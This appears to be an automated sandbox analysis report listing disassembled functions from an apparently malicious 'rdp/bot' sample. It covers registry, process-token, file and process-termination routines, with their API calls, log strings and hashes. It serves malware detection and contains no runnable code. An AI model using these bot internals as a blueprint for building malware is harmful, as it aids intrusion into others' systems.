Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CloseOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 716145365-253406552
Opcode ID: 72523dd42ad8032fe4d7ddf1207920d9eb1ce3ee780bd0d66baf9405c105d9d5
Instruction ID: 90e239d36146312105d82005ff5d2d01042678725c91c4225b1a75b167c4cc9c
Opcode Fuzzy Hash: 72523dd42ad8032fe4d7ddf1207920d9eb1ce3ee780bd0d66baf9405c105d9d5
Instruction Fuzzy Hash: DF81842194C70BC5FA707B11A840379F260AF517C4EF440BADB5EC6A91EFADA9C5C362

Function 00007FF76A905AC4 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF76A905AF9
RegDeleteValueA.ADVAPI32 ref: 00007FF76A905BFE
RegCloseKey.ADVAPI32 ref: 00007FF76A905D27

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A905BDF
, xrefs: 00007FF76A905C38
P, xrefs: 00007FF76A905CA9
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905D47
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A905B6F, 00007FF76A905B9F
, xrefs: 00007FF76A905B37
registry_del_value, xrefs: 00007FF76A905B13, 00007FF76A905B68, 00007FF76A905B98, 00007FF76A905BD8, 00007FF76A905C25, 00007FF76A905D40
, xrefs: 00007FF76A905B26
(key != NULL), xrefs: 00007FF76A905B91
[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF76A905C2C
P, xrefs: 00007FF76A905CB2
NULL, xrefs: 00007FF76A905C58, 00007FF76A905E11, 00007FF76A905E1D
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF76A905B1A
, xrefs: 00007FF76A905C41
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF76A905B5A, 00007FF76A905B8A
P, xrefs: 00007FF76A905DAC
(root != NULL), xrefs: 00007FF76A905B61

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CloseDeleteOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 3240087161-1648311886
Opcode ID: a973ef9243e36e095b25bd4e1a67da37fb8b2c772661af791121efe8287293ef
Instruction ID: 6e02f5e7eeb07416bbf5c710fe3562f745502ec6a27be4c7bbcb6b236b4cc059
Opcode Fuzzy Hash: a973ef9243e36e095b25bd4e1a67da37fb8b2c772661af791121efe8287293ef
Instruction Fuzzy Hash: BE817D2590C70BC5FA35B744A848378F290AF117C4FF481BBD95EC6AA5EE6DAD84C321

Function 00007FFE1150B1A0 Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32 ref: 00007FFE1150B1CA
GetTokenInformation.ADVAPI32 ref: 00007FFE1150B200
GetLastError.KERNEL32 ref: 00007FFE1150B20E
LocalFree.KERNEL32 ref: 00007FFE1150B248
CloseHandle.KERNEL32 ref: 00007FFE1150B253
GetLastError.KERNEL32 ref: 00007FFE1150B2F8
LocalAlloc.KERNEL32 ref: 00007FFE1150B3B0
GetTokenInformation.ADVAPI32 ref: 00007FFE1150B3DE
GetLastError.KERNEL32 ref: 00007FFE1150B3EC

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

LocalAlloc.KERNEL32 ref: 00007FFE1150B4DA
GetLengthSid.ADVAPI32 ref: 00007FFE1150B4EC

Strings

(sid != NULL), xrefs: 00007FFE1150B2A2
H:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFE1150B26B, 00007FFE1150B29B
[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE1150B22A, 00007FFE1150B401
(hnd != NULL), xrefs: 00007FFE1150B272
process_get_user_sid, xrefs: 00007FFE1150B223, 00007FFE1150B279, 00007FFE1150B2A9, 00007FFE1150B2DA, 00007FFE1150B306, 00007FFE1150B3FA
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FFE1150B2E1
[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE1150B30D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150B280, 00007FFE1150B2B0

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwrite
String ID: (hnd != NULL)$(sid != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
API String ID: 1151404744-2809655389
Opcode ID: aea9e89bfe65d953c02a92a976238f55aba443553f75ec613a9a8551a8e7671e
Instruction ID: 4ec61628e594098d26f4a72175dd2d27ff9b773340eeb05ec38620ed8bdf58e2
Opcode Fuzzy Hash: aea9e89bfe65d953c02a92a976238f55aba443553f75ec613a9a8551a8e7671e
Instruction Fuzzy Hash: 3491786AE0CD0381FB615F9BE4C03BD125AAF90774F2904BAD94E476B4DE3CE9858302

Function 00007FFE1150459B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFE115045C3
fclose.MSVCRT ref: 00007FFE115045F5
_errno.MSVCRT ref: 00007FFE115046AF
_errno.MSVCRT ref: 00007FFE115046D0
fwrite.MSVCRT ref: 00007FFE11504744

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11504662, 00007FFE11504692
(mode != NULL), xrefs: 00007FFE11504684
fs_file_write, xrefs: 00007FFE11504625, 00007FFE1150465B, 00007FFE1150468B, 00007FFE115046BD, 00007FFE1150476D, 00007FFE1150481D
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFE115046C4
NULL, xrefs: 00007FFE115047FA, 00007FFE11504806
(path != NULL), xrefs: 00007FFE11504654
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFE11504774
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1150464D, 00007FFE1150467D
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FFE11504824
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FFE1150462C

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-961576452
Opcode ID: 48d1972d550d396858ed4610e95cde024ad71582133a9006027b6594f555b4eb
Instruction ID: f5f2d827a92ec28deba3b1627b1285c6a1a47ce069a2d95cc2e0246e815b2383
Opcode Fuzzy Hash: 48d1972d550d396858ed4610e95cde024ad71582133a9006027b6594f555b4eb
Instruction Fuzzy Hash: 4B517261A08E4392FB11AB97E9402BD3B5ABF407B5F5855B6D90D472B4EF3CE506C300

Function 00007FF76A901F9E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A901FBD
CreateDirectoryA.KERNEL32 ref: 00007FF76A901FDF
GetLastError.KERNEL32 ref: 00007FF76A902030
_mbscpy.MSVCRT ref: 00007FF76A902081
strlen.MSVCRT ref: 00007FF76A902089
strlen.MSVCRT ref: 00007FF76A9020A5
strlen.MSVCRT ref: 00007FF76A9020B6
CreateDirectoryA.KERNEL32 ref: 00007FF76A902127
GetLastError.KERNEL32 ref: 00007FF76A902131

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A902015
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF76A902049
NULL, xrefs: 00007FF76A902257
(path != NULL), xrefs: 00007FF76A902007
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FF76A9020E0
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF76A90226D
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A902000
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF76A902206
fs_dir_create, xrefs: 00007FF76A90200E, 00007FF76A902042, 00007FF76A9020D9, 00007FF76A9021FF, 00007FF76A902266

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$_mbscpy
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 3496426206-906809513
Opcode ID: 3f4eedb711a649e55d310dacf8de06f5a5a49a2def36bbb7cec4131cbff512c4
Instruction ID: 2d68b0e8b467762c8ddf8c2e24355932e07e4b4d2d7b564a43b61569ba2e5d27
Opcode Fuzzy Hash: 3f4eedb711a649e55d310dacf8de06f5a5a49a2def36bbb7cec4131cbff512c4
Instruction Fuzzy Hash: 74715E12B0C343C9FB657B18E8803B99251AB987C4FF401FADB5EC6695DE3DA885C321

Function 00007FF76A904CA0 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FF76A904D2D
RegOpenKeyExA.ADVAPI32 ref: 00007FF76A904E6F
RegCloseKey.ADVAPI32 ref: 00007FF76A9050AE

Strings

(subkey_len != NULL), xrefs: 00007FF76A904E3A
[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FF76A904EEF
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FF76A90509F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A904DB2, 00007FF76A904DE2, 00007FF76A904E15, 00007FF76A904E48
(subkey != NULL), xrefs: 00007FF76A904E07
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FF76A904D76
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF76A904E91
(key != NULL), xrefs: 00007FF76A904DD4
NULL, xrefs: 00007FF76A90516D
registry_enum_key, xrefs: 00007FF76A904D6F, 00007FF76A904DAB, 00007FF76A904DDB, 00007FF76A904E0E, 00007FF76A904E41, 00007FF76A904E8A, 00007FF76A904EE8, 00007FF76A905098, 00007FF76A905195
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FF76A90519C
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF76A904D9D, 00007FF76A904DCD, 00007FF76A904E00, 00007FF76A904E33
(root != NULL), xrefs: 00007FF76A904DA4

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-1739142668
Opcode ID: 7939dac208512d10af6a66e8bf5d27c779fb94e2900f7717edec28d96a0b39f0
Instruction ID: b4b47218cc2862f249c08c6e0f3f03ed1a0add5f668a98811a0cc36351b3dd2e
Opcode Fuzzy Hash: 7939dac208512d10af6a66e8bf5d27c779fb94e2900f7717edec28d96a0b39f0
Instruction Fuzzy Hash: 56B18F7290C302D6F760A744E4407B8A292AFE13C8FB941BAD55ECB690CE7CFD858761

Function 00007FFE11507DA0 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FFE11507E2D
RegOpenKeyExA.ADVAPI32 ref: 00007FFE11507F6F
RegCloseKey.ADVAPI32 ref: 00007FFE115081AE

Strings

NULL, xrefs: 00007FFE1150826D
(subkey_len != NULL), xrefs: 00007FFE11507F3A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507EB2, 00007FFE11507EE2, 00007FFE11507F15, 00007FFE11507F48
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FFE1150829C
(subkey != NULL), xrefs: 00007FFE11507F07
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE11507F91
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE1150819F
[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FFE11507FEF
registry_enum_key, xrefs: 00007FFE11507E6F, 00007FFE11507EAB, 00007FFE11507EDB, 00007FFE11507F0E, 00007FFE11507F41, 00007FFE11507F8A, 00007FFE11507FE8, 00007FFE11508198, 00007FFE11508295
(key != NULL), xrefs: 00007FFE11507ED4
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE11507E9D, 00007FFE11507ECD, 00007FFE11507F00, 00007FFE11507F33
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE11507E76
(root != NULL), xrefs: 00007FFE11507EA4

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-1739142668
Opcode ID: 5e8814fb2432cf8713781d49c9d023d0b91865df381457722a0715df4d87d9e4
Instruction ID: 2dade6a200ca0863d35eee9b80971a8614afd8e267ec7da84eb23884355d7db9
Opcode Fuzzy Hash: 5e8814fb2432cf8713781d49c9d023d0b91865df381457722a0715df4d87d9e4
Instruction Fuzzy Hash: 5BB18F62E0CE43C6F7208B96E85077C235AAF84774F2515BADA8E472B4DE7CED858301

Function 00007FFE1150C841 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 00007FFE1150C85B
WaitForSingleObject.KERNEL32 ref: 00007FFE1150C87F
GetExitCodeProcess.KERNEL32 ref: 00007FFE1150C88D
GetLastError.KERNEL32 ref: 00007FFE1150C934
TerminateProcess.KERNEL32 ref: 00007FFE1150CA21
GetLastError.KERNEL32 ref: 00007FFE1150CA2F
GetLastError.KERNEL32 ref: 00007FFE1150CB16

Part of subcall function 00007FFE1150C7E5: CloseHandle.KERNEL32 ref: 00007FFE1150C7FD
Part of subcall function 00007FFE1150C7E5: CloseHandle.KERNEL32 ref: 00007FFE1150C803

Strings

H:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFE1150C8DA
[E] (%s) -> Failed(pid=%lu,err=%08x), xrefs: 00007FFE1150C91E
(pi != NULL), xrefs: 00007FFE1150C8E1
[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FFE1150C94A
[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu), xrefs: 00007FFE1150CA45
[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FFE1150CB2A
process_close, xrefs: 00007FFE1150C8BD, 00007FFE1150C8E8, 00007FFE1150C917, 00007FFE1150C943, 00007FFE1150CA3E, 00007FFE1150CB23
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C8EF
[I] (%s) -> Done(pid=%lu,exit_code=%08lx), xrefs: 00007FFE1150C8C4

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
API String ID: 1879646588-3634134927
Opcode ID: d8083e1282ff8dd82df0608f281ef9451730e539ff7042609b78cbcea3b2c2ad
Instruction ID: d535b6ebff416cc52cdf79f4d26ee8287f15eba0e8919b387f51cf6ced3822de
Opcode Fuzzy Hash: d8083e1282ff8dd82df0608f281ef9451730e539ff7042609b78cbcea3b2c2ad
Instruction Fuzzy Hash: 6A81D222E0CE1786FB709797A4803BC62599F02774F2654FACC5E572B4DE2CBC849382

Function 00007FF76A901849 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF76A90186A
GetLastError.KERNEL32 ref: 00007FF76A90194A

Strings

(path != NULL), xrefs: 00007FF76A9018E7
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A9018BE
P, xrefs: 00007FF76A9019D3
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A9018E0, 00007FF76A901919
c, xrefs: 00007FF76A901911
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9018F5, 00007FF76A90192E
~, xrefs: 00007FF76A9019CE
NULL, xrefs: 00007FF76A901A7A
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF76A901A93
, xrefs: 00007FF76A90196B
fs_attr_get, xrefs: 00007FF76A9018B7, 00007FF76A9018EE, 00007FF76A901927, 00007FF76A901958, 00007FF76A901A8C
(attr != NULL), xrefs: 00007FF76A901920
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF76A90195F

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-2463373822
Opcode ID: 65f0fbf948d4d226f17352df06bc4ea32ecc3c490979e5ba0d1a60200e6d5835
Instruction ID: 96c0d6ea4f53e320159612b38943dc41284825e1594eac6bec025ff34b417359
Opcode Fuzzy Hash: 65f0fbf948d4d226f17352df06bc4ea32ecc3c490979e5ba0d1a60200e6d5835
Instruction Fuzzy Hash: AA515E61E0C717C5FB257B05A8803B9E2517F027D8FF401BAC96ECA6D0BE6DAA458331

Function 00007FFE11503B69 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE11503B8A
GetLastError.KERNEL32 ref: 00007FFE11503C6A

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11503C15, 00007FFE11503C4E
~, xrefs: 00007FFE11503CEE
(attr != NULL), xrefs: 00007FFE11503C40
, xrefs: 00007FFE11503C8B
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11503BDE
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11503C00, 00007FFE11503C39
fs_attr_get, xrefs: 00007FFE11503BD7, 00007FFE11503C0E, 00007FFE11503C47, 00007FFE11503C78, 00007FFE11503DAC
P, xrefs: 00007FFE11503CF3
c, xrefs: 00007FFE11503C31
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE11503C7F
NULL, xrefs: 00007FFE11503D9A
(path != NULL), xrefs: 00007FFE11503C07
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE11503DB3

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
